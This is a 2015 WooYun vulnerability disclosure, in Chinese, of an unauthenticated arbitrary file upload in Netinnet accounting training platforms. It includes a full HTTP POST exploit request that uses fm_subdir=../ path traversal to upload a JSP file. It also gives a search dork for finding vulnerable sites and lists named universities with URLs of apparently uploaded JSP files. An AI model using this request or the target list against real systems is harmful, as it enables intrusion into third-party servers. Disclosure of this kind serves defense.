当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099960

漏洞标题:某会计实训系统全版本通用任意文件上传

相关厂商:厦门网中网软件有限公司

漏洞作者: 路人甲

提交时间:2015-03-09 13:20

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

前台任意文件上传

详细说明:

厦门网中网软件有限公司成立于2005年,是高新技术企业、双软认定企业。公司坐落于厦门软件园二期,办公面积2500平方米。自成立以来,公司专注于财会教学软件的研发,是国内教学软件市场领导企业,在财会专业仿真教学软件领域市场占有率达60%以上,拥有包括北京大学、中国人民大学、厦门大学、东北财经大学、中山大学、山西财政专科学校、四川财经职业技术学院等在内的1000余所院校客户群。其中,财会系列实训软件在国内大中专院校的会计实践教学中起到了重要作用,每年有超过50万学生使用公司的仿真教学软件。
可通过百度关键字:

/netinnet_


搜索到存在漏洞的站点
本次漏洞的根由是系统内的上传附件处,方法未授权访问,上传路径可控,导致shell成功

QQ截图20150307000828.png


通过抓包我们发现,上传后的文件路径有返回给用户,url中存在一个参数fm_subdir,其值就是上传文件所在的文件夹,其值可控。

POST http://demo.netinnet.cn/netinnet_zhsx_V3/douploaddatafile?action=common_img&start=upload_img&fm_maxSize=10240&fm_subdir=../ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: 
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df2e937204b0
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 292
Host: demo.netinnet.cn
Pragma: no-cache
Cookie: 
-----------------------------7df2e937204b0
Content-Disposition: form-data; name="img_src"
-----------------------------7df2e937204b0
Content-Disposition: form-data; name="blob"; filename="test.jsp"
Content-Type: image/pjpeg
wooyun test
-----------------------------7df2e937204b0--


为什么要突出路径可控呢,因为默认的上传路径已经过权限处理,不允许执行可执行程序

fm_subdir=../


之所以敢说是所有版本,是因为该上传组件是系统的公共组件
http://demo.netinnet.cn:80/netinnet_sjzh/ 审计综合实习平台(版本2.3)
http://demo.netinnet.cn:80/netinnet_bill/ 会计表单帮助系统(版本1.2)
http://demo.netinnet.cn:80/netinnet_zhsx/ 会计综合实习平台(版本4.0)
http://demo.netinnet.cn:80/netinnet_zhsx_gdsz 会计综合实习平台(版本4.0)
http://demo.netinnet.cn:80/netinnet_zhsx_V3 会计综合实习平台(版本3.1)
http://demo.netinnet.cn:80/netinnet_cbkj_v52/ 成本会计实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_cbkj_v53/ 成本会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_cnsw_v52/ 出纳实务实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_cnsw_v53/ 出纳实务实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_cwfx_v52/ 财务分析实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_cwfx_v53/ 财务分析实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_cwgl_v52/ 财务管理实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_cwgl_v53/ 财务管理实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_fdc_tshy_v53/ 房地产会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_fwykj_v52/ 服务业会计实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_glkj_v53/ 管理会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_jckj_v52/ 基础会计实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_jckj_v53/ 基础会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_jdkj_v53/ 酒店会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_jpk/ 精品课网站平台(版本1.3)
http://demo.netinnet.cn:80/netinnet_kjfg_v53/ 财会分岗实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_lyy_tshy_v53/ 旅游业会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_mjfyl_tshy_v53/ 非营利机构组织会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_sandtable/ 财会沙盘实训教学平台(版本1.0)
http://demo.netinnet.cn:80/netinnet_sgqy_tshy_v53/ 施工企业会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_sjdx_v52/ 审计实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_sjdx_v53/ 审计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_spltqy_v53/ 商品流通企业会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_swkj_v52/ 税务会计实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_swkj_v53/ 税务会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_wmkj_v53/ 外贸会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_wsbs_v53/ 电子报税模拟教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_wsbs_v60/ 电子报税实训教学平台(版本6.0)
http://demo.netinnet.cn:80/netinnet_wygl_tshy_v53/ 物业管理企业会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_yhkj_v52/ 银行会计实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_ys_tshy_v53/ 预算会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_zjkj2_v52/ 中级会计(综合)实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_zjkj2_v53/ 中级会计(综合)实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_zjkj_v52/ 中级会计(单项)实训教学平台(版本5.2)
http://demo.netinnet.cn:80/netinnet_zjkj_v53/ 中级会计(单项)实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_zxqy_v53/ 中小企业会计实训教学平台(版本5.3)
http://demo.netinnet.cn:80/netinnet_zyks_v13/ 会计作业平台(版本1.3)
其它用户案例:
http://202.116.95.7/netinnet_cwgl_v60 中山大学新华学院
http://202.116.95.7/netinnet_cwgl_v60/EFFE72BBC0A8FF1F00000003921726.jsp

QQ截图20150307005048.png


http://gxyxoa.com:8080/广西银行学校综合实习平台
http://gxyxoa.com:8080/netinnet_yhkj_v60/F00317CEC0A8010A00000001541093.jsp
http://202.100.91.165/ 兰州大学网络教育学院财会综合实习平台会计实习中心
http://202.100.91.165/netinnet_jckj_v60/F0042758CA645BA500000002523756.jsp
http://yad.cj.hbvtc.edu.cn/ 湖北职业技术学院财经学院
http://yad.cj.hbvtc.edu.cn/netinnet_wsbs_v60/F005A9A30AFEF01500000004418018.jsp
http://120.42.37.3:8080/ 厦门某高校
http://120.42.37.3:8080/netinnet_sandtable/F006BAD4C0A864DF00000215961738.jsp
例子很多,时间关系不一一证明

漏洞证明:

QQ截图20150307000828.png


QQ截图20150307000843.png


QQ截图20150307000928.png


QQ截图20150307004501.png


QQ截图20150307004536.png


QQ截图20150307004556.png


QQ截图20150307004617.png


QQ截图20150307004636.png


修复方案:

上传过滤文件名

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝